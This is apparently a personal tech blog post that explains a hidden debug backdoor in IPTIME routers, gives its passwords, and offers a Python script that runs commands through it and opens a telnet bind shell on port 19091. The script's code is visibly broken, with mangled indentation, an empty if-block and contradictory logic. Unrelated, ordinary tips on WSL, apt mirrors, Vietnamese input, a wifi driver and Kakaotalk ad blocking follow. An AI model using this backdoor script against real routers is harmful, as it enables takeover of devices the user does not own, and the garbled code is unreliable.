Getting shell access to your IPTIME router

This article in a nutshell

  • How to hack your iptime router and get complete access to its function
  • Works up to firmware v9.27
  • You need administrator password to do anything
  • The default administrator account for iptime is username admin / password admin
  • You can’t hack other people’s router with this as you need the admin account anyway, not to mention it’s illegal in Korea 😉


IPTIME Is a popular router brand in Korea. You can’t ssh to it, you can’t telnet to it. But they have a backdoor where you can get shell access via the web interface…

How to access this

Check your firmware version, if the version is <= 9.12, the password is #notenoughmineral^, if the version is > 9.12 upto 9.27, it’s [email protected]*&. If newer, I don’t know the password yet.

Login to your router, note the second part of the URL, is it cgi-bin or sess-bin?

Go to http://<your router ip>/<second part above/d.cgi?aaksldkfj=<the password>

You should see a screen similar to above. Congrats, you got shell access to your router.

How to automate this

Install python3 and run this script

import requests
import sys

pass_old = '#notenoughmineral^'
pass_new = '[email protected]*&'

## file changed!
userid = ''
userpw = ''

_Passname = 'aaksjdkfj'
_Passkey = ''

_dest = '/sess-bin/d.cgi'
_setdest = '/sess-bin/timepro.cgi'

_startParam = {_Passname : _Passkey }
_commandParam = {'act':'1','fname':'','cmd':''}

_enable = 'tmenu=sysconf&smenu=misc&act=remote_support&commit=&hostname=&autosaving=1&fakedns=0&nologin=0&wbm_popup=0&upnp=1&led_flag=0&ispfake=0&newpath=&remote_support=1&apcplan=1'
_disable = 'tmenu=sysconf&smenu=misc&act=remote_support&commit=&hostname=&autosaving=1&fakedns=0&nologin=0&wbm_popup=0&upnp=1&led_flag=0&ispfake=0&newpath=&remote_support=0&apcplan=1'

### chmod disabled!
_telnet_check = 'ls -al /sbin'
_permission_enable = '/bin/chmod 777 /sbin/iptables'
_permission_enable2 = '/bin/chmod 777 /sbin/utelnetd'
_telnet_enable_1 = '/sbin/iptables -A INPUT -p tcp --dport 19091 -j ACCEPT'
#_telnet_enable_1 = '/sbin/iptables -A INPUT -p tcp -m -tcp --dport 2323 -j ACCEPT'
_get_iptables = '/sbin/iptables --list'
_telnet_enable_2 = '/sbin/utelnetd -p 19091'
_demon_mode = 'cat /default/var/boa_vh.conf'

sess = requests.session()

def get(args):
    return sess.get(url='http://%s%s' % (sys.argv[1], _dest), params=args).text

def startup():
    x = _startParam.copy()
    if get(x).find('Command Name : ') == -1:
        print ("[x] Not vulnerable machine! cannot access debugging page.")
    print ("[o] Debugging page exist!")

def deleteChunk(ref):
    findx = ref.find('<font size=-1>')
    ref = ref[findx:]
    ref = ref.replace('<font size=-1>','')
    ref = ref.replace('\n</font><br>','')
    return ref

def bind_shell():
    x =_commandParam.copy()
    x['cmd'] = _telnet_check
    ref = get(x)
    findx = ref.find('<font size=-1>')
    ref = ref[findx:]
    ref = ref.replace('<font size=-1>','')
    ref = ref.replace('\n</font><br>','')
    if ref.find('utelnetd') == -1:
        print ('[x] OOPS! Could not found telnet demon.')
        print ('[x] no exploitable -.-')
    x['cmd'] = _demon_mode
    ref = deleteChunk(get(x))
    if ref.find('root') == -1:
        print ('[x] OOPS! httpd demon is not running at root.')
        print ('[x] no exploitable -.-')
        print ('[!] Exploitable! we start working...')
        x =_commandParam.copy()
        sys.stdout.write('[!] Setting up iptables... ')
        x['cmd'] = _telnet_enable_1
        ref = get(x)
        x['cmd'] = _get_iptables
        ref = deleteChunk(get(x))
        if ref.find('19091') == -1 :
        print ('')
        print ('[!] Working telnet demon server...')
        x['cmd'] = _telnet_enable_2
        print ('[o] Binding shell command executed. check it yourself. (port:19091)')

def showcmd(cmd):
    x = _commandParam.copy()
    x['cmd'] = cmd
    ref = get(x)
    t = deleteChunk(ref)
    if t == '>' : return()
    print (t)

if __name__ == '__main__':

    print ('[] - Directiry Debugging IPTIME python module - command eXecuter!')
    print ('Support : IPTIME 7.?? - 9.72')
    print ('Copyright :\n')
    print ('firmware_version : (~ 9.12 = 0) / (9.14 ~ 9.72 = 1)')
    print ('Type "exit" to exit, "bind-shell" to bind telnet connection to port 2323. (deprecated)')

    if len(sys.argv) < 3:
        print ('\n>>> python3 hostname firmware_version [userid] [userpw]\n')
        print('firmware_version : (~ 9.12 = 0) / (9.14 ~ 9.72 = 1)')

    sys.argv[1] = sys.argv[1].replace('http://','')
    sys.argv[1] = sys.argv[1].replace('/','')

    if int(sys.argv[2]) is 0:
        _Passkey = pass_old
        _Passkey = pass_new

        userid = sys.argv[3]
        userpw = sys.argv[4]
        sess.auth = (userid, userpw)

    _commandParam['aaksjdkfj'] = _Passkey

    while True:
        sys.__stdout__.write (sys.argv[1] + '> ')
        x = input()
        if x == 'exit': exit(0)
        elif x == 'bind-shell': bind_shell()
        elif x != '' : showcmd(x)

How did people find this


  1. Download the firmware from IP Time’s website
  2. Extract the firmware with binwalk
  3. Extract the squashfs file inside the bundle
  4. Disassemble timepro.cgi (d.cgi is a link to timepro.cgi)
  5. Find “remote support” function
  6. The password should be nearby

How I tried it for more modern IPTIME routers

I did everything swimmingly up until step 4, I can’t find “remote support” on newer firmware (10.02) for the router A1004V I’m working on 🙁

Instead of IDA for Windows, I used ghidra, a disassembly framework by the NSA (thanks, NSA!). It’s free and very feature complete 🙂


Very nice UI eh? When I have time I’ll dig into it more, it’s probably still there somewhere

Today I Learned (2019-11-18)

How to reset WSL on Windows

  • Type apps & into the search box in the bottom left of the taskbar.
  • Click Apps & features in the search results. The Settings app will open.
  • On the Apps & features page in the Settings app, type Ubuntu, or the name of the Linux distribution you want to reset, in the ‘Search this list’ box.
  • Ubuntu, or the name of your Linux distribution, will appear. Click it and then click Advanced options.
  • In the Settings app, scroll down the list of options until you see Reset. There are two options, Repair and Reset. We want to reset our distribution, so click Reset.
  • You will see a warning that resetting the app will permanently delete its data and sign-in preferences. Click Reset again in the pop-out dialog.
  • The resetting process will take a few seconds. Once it’s complete, a tick icon will appear to the right of the Reset button.

Changing mount path of WSL from /mnt/c to /c

This works for all of your drives at once. Create /etc/wsl.conf with this content

# Enable extra metadata options by default
enabled = true
root = /
options = "metadata,umask=22,fmask=11"
mountFsTab = false

# Enable DNS – even though these are turned on by default, we’ll specify here just to be explicit.
generateHosts = true
generateResolvConf = true


Move WSL to an external drive

1. Set permissions to the target folder. First, I think you must set some permissions to the folder where the distribution will be moved. You may use icacls <dir> /grant "<user>:(OI)(CI)(F)" to set the proper permissions.

C:\> whoami

C:\> icacls D:\wsl /grant "jaime:(OI)(CI)(F)"

NOTE: In addition to the above permissions, I have activated the long path names in Windows.

2. Move the distribution. Using lxrunoffline move.

C:\wsl> lxrunoffline move -n Ubuntu-18.04 -d d:\wsl\installed\Ubuntu-18.04

You may check the installation folder using

C:\wsl> lxrunoffline get-dir -n Ubuntu-18.04

3. Run the distribution. after moving the distribution, you can run the distribution using wsl or the same lxrunoffline

C:\wsl> lxrunoffline run -n Ubuntu-18.04 -w
[email protected]:~$ exit

C:\wsl> wsl
[email protected]:/mnt/c/wsl$ exit

Use the mirror protocol to automatically select the best mirror

Using mirror protocol as part of your /etc/apt/sources.list entry will instruct apt command to fetch mirrors located within your country only. In order to use mirror protocol update all lines within /etc/apt/sources.list file from the usual eg.:

deb ...


deb mirror:// ...

Repeat the above for all relevant lines where appropriate. Alternatively, use sed command to automatically edit your /etc/apt/sources.list file. Update the below sed command where appropriate to fit your environment:

$ sudo sed -i -e 's/http:\/\/archive/mirror:\/\/mirrors/' -e 's/\/ubuntu\//\/mirrors.txt/' /etc/apt/sources.list

Gõ tiếng Việt trên Ubuntu

Cách gõ Dvorak trên Ubuntu với ibus-unikey

Các bộ gõ tiếng Việt trên ubuntu

  • ibus-unikey là bộ gõ có sẵn trong source, dễ cài nhất nhưng có vấn đề bị revert keyboard như ở trên
  • ibus-teni (telex-vni) mới hơn
  • ibus-bamboo: cùng tiêu chí với teni, bộ gõ mới nhất, được cập nhật thường xuyên, hỗ trợ nhiều chế độ gõ cho nhiều ứng dụng khác nhau, tuy nhiên chưa được nổi tiếng như ibus-unikey vì hầu hết các tài liệu hướng dẫn đều viết về ibus-unikey (có lẽ vì unikey namesake quá nổi tiếng trên Windows)

Install IP Time USB Wifi Adapter driver for Ubuntu Linux

It’s not that hard… provided you know where to look.

First, find out the model ID by going


You’ll get something like this, where “Realtek” is the chip manufacturer, which is usually the case for IPTime

Next, google the ID, it will take you to stack overflow, in my case, this answer

Which leads me to this repository

A few commands later…

cd rtl88x2BU_WiFi_linux_v5.3.1_27678.20180430_COEX20180427-5959
VER=$(sed -n 's/\PACKAGE_VERSION="\(.*\)"/\1/p' dkms.conf)
sudo rsync -rvhP ./ /usr/src/rtl88x2bu-${VER}
sudo dkms add -m rtl88x2bu -v ${VER}
sudo dkms build -m rtl88x2bu -v ${VER}
sudo dkms install -m rtl88x2bu -v ${VER}
sudo modprobe 88x2bu

And voila, it works even without a reboot

Block ads on Kakaotalk client

The kakaotalk client on Mac is okay but the Windows client is full of ads: ads in friend list, ads in chat, ads in the corner of the screen, ad under your cursor.

It annoyed me to no end. So what’s the solution? Find a way to block it!

I used a nifty tool called TCP View (very old, but still works). It can resolve domains from IP address and is not as heavy as Wireshark 😉

I looked up the domains kakaotalk.exe connects to and found the following, so I added this to /Windows/System32/drivers/etc/hosts

#Block kakao ads

And voilà! No more annoying ads!


Since Kakao stopped offering the Windows Store version (which had less ads), it’s time for an update

There’s a Korean program that runs in the background and block the ads for you.

You can find it here . The drawback is you need to install and keep it running with administrator priviledges, but at least it’s open source so you can have a look 🙂